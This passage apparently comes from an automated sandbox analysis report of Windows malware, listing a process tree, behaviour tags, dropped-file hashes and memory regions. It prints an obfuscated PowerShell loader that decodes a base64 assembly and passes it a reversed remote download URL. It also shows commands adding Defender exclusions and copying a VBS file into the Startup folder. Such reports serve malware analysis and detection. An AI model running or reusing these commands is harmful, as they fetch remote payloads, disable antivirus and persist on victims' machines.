'C:\Users\Admin\AppData\Local\Temp\test.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '22%d4f3b283ef62fabee5f9fb2e592dec8422%=v&daolnwod=ecruos&txt.4202.80.92.iav.aroga72%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.80.92.iav.aroga22%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.5febd4a3ebc5-7d99-0854-df0d-90e19f1f/plZj1uOD/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , $hzwje , 'true1' ) );};"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1312
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:960
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1956
              • C:\Windows\system32\cmd.exe
                cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
                5⤵
                  PID:1884
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3188
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\test.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test.vbs"
                  5⤵
                    PID:3104
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.vbs"
                    5⤵
                      PID:3404
                    • C:\Windows\system32\cmd.exe
                      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\test.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test.vbs"
                      5⤵
                        PID:4092
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.vbs"
                        5⤵
                          PID:4456
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\test.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test.vbs"
                          5⤵
                            PID:2924
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.vbs"
                            5⤵
                              PID:4516
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\test.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test.vbs"
                              5⤵
                                PID:1136
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.vbs"
                                5⤵
                                  PID:4016
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\test.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test.vbs"
                                  5⤵
                                    PID:4164
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.vbs"
                                    5⤵
                                      PID:1396
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\test.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test.vbs"
                                      5⤵
                                        PID:2476
                                      • C:\Windows\system32\cmd.exe
                                        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.vbs"
                                        5⤵
                                          PID:4512

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                  Filesize

                                  2KB

                                  MD5

                                  2f57fde6b33e89a63cf0dfdd6e60a351

                                  SHA1

                                  445bf1b07223a04f8a159581a3d37d630273010f

                                  SHA256

                                  3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                  SHA512

                                  42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                • C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

                                  Filesize

                                  336B

                                  MD5

                                  2d5b37dd89d2202f27b527dda2b5d903

                                  SHA1

                                  336305a73c54ccfdc0b9fd79b56896020b5acd85

                                  SHA256

                                  8104124cd3042126cf50473304d9322b878c41424997381790baf891e8d9a5a2

                                  SHA512

                                  c4ecc17f45cc5ae53bc1e69dc646a71045d49e7cdd4c45af62f855fd10d559f5b61b1e848acf8cfd2c57806f5e570e92b7b1deda6dcb975a2bc17e9ad28ec0b1

                                • C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.txt

                                  Filesize

                                  355B

                                  MD5

                                  967eb55005b30c47f32376bc2bcfe01d

                                  SHA1

                                  4e0ef0d27139685f669c2d209517bbb76649a10e

                                  SHA256

                                  1b5d83bb7b160cf7af02f1fcd87dc47a851495339e98e1f3c369337c6b96a31f

                                  SHA512

                                  6d24c54302e9e9f3d8702037a83185279acac8fae1e93b798ad480148f63bee1a34d90c5c9a0da4c1571ed3d4b1d69033137027aac4b9ace9134f9a3a4546062

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  944B

                                  MD5

                                  64a10d8c6b5db372b97edf35ede19e5e

                                  SHA1

                                  3f4d2156f3a2f53422a9cbdc421ef1220194349b

                                  SHA256

                                  81b2060200caac5f5790306c2b23fd3b0e4fb8806d02f34fc9f1c86d61cbfc3b

                                  SHA512

                                  ec3aa311a0ab17211b14cf10ca53f1ea4750b896e5171c5557c6ac92da48c2d23dc5ffbf920d5aab77d40612270b498713f180090fda157c15fa20cac91d96ce

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  6c4805e00673bef922d51b1a7137028f

                                  SHA1

                                  0eabb38482d1733dd85a2af9c5342c2cafcd41eb

                                  SHA256

                                  7af7d25fe7e3bb8b75bcffaa8573e2e9af7e7f70a840fa8bc0196d0ab396ecdd

                                  SHA512

                                  eb6dacb4e0da6f45028ebf65ebffdc6aecdb6a34a582bb69aa5836ef02a7115f6b500ef2dd6a2c2be994ec9d0cbbff564368724593666105d3d4475441830cc1

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4sffw5xu.5qj.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • C:\Users\Admin\AppData\Local\Temp\test.vbs

                                  Filesize

                                  683KB

                                  MD5

                                  cc70234352fc64b2bc301d09a09cfc2e

                                  SHA1

                                  a56a001bf2d8f7b9253f4a62ca41b68b90c380aa

                                  SHA256

                                  74181bbcda50e765f25cd91cb767c727037cb22274b053f5c5cbb486bcdee8f1

                                  SHA512

                                  4a37464a06b2bb18a1ed82dc04888146db811295131c07d2d271e8424303617429d18cd418dc69eddf7d26d7e8398287aebd41664fd8d6b1027b578121c25663

                                • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                  Filesize

                                  16B

                                  MD5

                                  d29962abc88624befc0135579ae485ec

                                  SHA1

                                  e40a6458296ec6a2427bcb280572d023a9862b31

                                  SHA256

                                  a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

                                  SHA512

                                  4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

                                • memory/1312-131-0x000001903DC30000-0x000001903DC3A000-memory.dmp

                                  Filesize

                                  40KB

                                • memory/3760-65-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/3760-85-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/3760-71-0x000001ACD0940000-0x000001ACD0962000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/4640-12-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-3-0x00007FF8678D0000-0x00007FF8678E0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4640-15-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-14-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-17-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-19-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-18-0x00007FF866920000-0x00007FF866930000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4640-16-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-35-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-34-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-44-0x00007FF8A78ED000-0x00007FF8A78EE000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/4640-45-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-49-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-10-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-11-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-13-0x00007FF866920000-0x00007FF866930000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4640-9-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-0-0x00007FF8A78ED000-0x00007FF8A78EE000-memory.dmp

                                  Filesize

                                  4KB

                                • memory/4640-1-0x00007FF8678D0000-0x00007FF8678E0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4640-6-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-7-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-126-0x00007FF8678D0000-0x00007FF8678E0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4640-127-0x00007FF8678D0000-0x00007FF8678E0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4640-129-0x00007FF8678D0000-0x00007FF8678E0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4640-128-0x00007FF8678D0000-0x00007FF8678E0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4640-130-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-8-0x00007FF8A7850000-0x00007FF8A7A45000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4640-4-0x00007FF8678D0000-0x00007FF8678E0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4640-5-0x00007FF8678D0000-0x00007FF8678E0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4640-2-0x00007FF8678D0000-0x00007FF8678E0000-memory.dmp

                                  Filesize

                                  64KB